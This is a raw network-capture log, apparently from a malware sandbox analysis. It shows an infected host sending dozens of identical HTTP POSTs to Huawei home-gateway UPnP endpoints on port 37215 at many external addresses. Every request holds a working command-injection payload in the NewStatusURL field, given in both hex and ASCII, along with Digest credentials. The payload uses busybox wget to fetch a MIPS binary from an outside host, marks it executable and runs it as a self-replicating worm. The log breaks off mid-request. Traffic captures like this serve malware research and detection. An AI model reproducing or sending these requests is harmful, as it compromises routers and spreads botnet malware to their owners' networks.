                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1420192.168.2.1543148197.133.108.17837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.850476027 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1421192.168.2.155427690.228.179.4037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.850496054 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1422192.168.2.1534672197.198.12.3137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.858266115 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1423192.168.2.1535360157.43.249.12137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.829411983 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1424192.168.2.1537734197.16.174.23637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.854768991 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1425192.168.2.1538346157.116.192.20837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.855027914 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1426192.168.2.1538754204.159.61.18737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.855062962 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1427192.168.2.1543220197.61.212.10937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.855365038 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1428192.168.2.1556560157.166.165.10737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.855393887 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1429192.168.2.1534784197.214.17.16637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.855407953 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
